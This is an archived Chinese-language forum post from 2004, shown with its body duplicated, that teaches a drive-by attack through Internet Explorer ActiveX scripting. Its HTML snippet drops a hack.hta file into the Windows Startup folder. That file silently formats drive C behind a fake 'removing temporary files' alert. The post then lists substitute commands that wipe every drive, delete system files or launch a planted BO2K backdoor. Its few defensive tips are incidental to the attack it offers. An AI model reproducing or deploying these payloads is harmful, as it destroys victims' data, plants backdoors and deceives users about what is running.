史萊姆論壇

史萊姆論壇 (http://forum.slime.com.tw/)
-   作業系統操作技術文件 (http://forum.slime.com.tw/f128.html)
-   -   超酷手段:通過網頁攻擊客戶端機 (http://forum.slime.com.tw/thread130460.html)

psac 2004-10-23 06:41 AM
超酷手段:通過網頁攻擊客戶端機
 
文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的。注:文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的.
防護辦法:不執行不知名的Active控件或者把機器中那些不太常用的指令,如format.exe,進行更名.
文章作者︰f\*\*k

前敘︰

這項技術是在沒多久以前台灣所流行的攻擊法,你知道利用漏洞的厲害在哪嗎?

這一項教學就是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的
攻擊方法。

教學開始︰

以下這段就是具有破壞性的HTML

Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人應該就看得出來其中精隨)

現在我大概來解釋其中幾個項目所寫的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"

這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。

它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。

這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。

最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。

執行其他攻擊指令的方法︰

只要修改「start.exe /m format c:/q /autotest /u」這一項便形。

start.exe /m format c:/q /autotest /u

其中的「c:」可以換做其他的硬碟。

(path)\bo2k.exe

執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

殺掉對方硬碟底下所有的檔案。

start.exe /m deltree /y c:\windows\system\*.*

殺掉對方c:\windows\system\目錄底下的所有檔案。

後敘︰

預防遭此手段的破壞就是到微軟去更新你的瀏覽器。



以下這段就是具有破壞性的HTML

Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人應該就看得出來其中精隨)

現在我大概來解釋其中幾個項目所寫的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"

這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。

它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。

這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。

最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。

執行其他攻擊指令的方法︰

只要修改「start.exe /m format c:/q /autotest /u」這一項便形。

start.exe /m format c:/q /autotest /u

其中的「c:」可以換做其他的硬碟。

(path)\bo2k.exe

執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

殺掉對方硬碟底下所有的檔案。

start.exe /m deltree /y c:\windows\system\*.*

殺掉對方c:\windows\system\目錄底下的所有檔案。

後敘︰

預防遭此手段的破壞就是到微軟去更新你的瀏覽器。


所有時間均為台北時間。現在的時間是 11:02 PM

Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.

『服務條款』

* 有問題不知道該怎麼解決嗎?請聯絡本站的系統管理員 *


SEO by vBSEO 3.6.1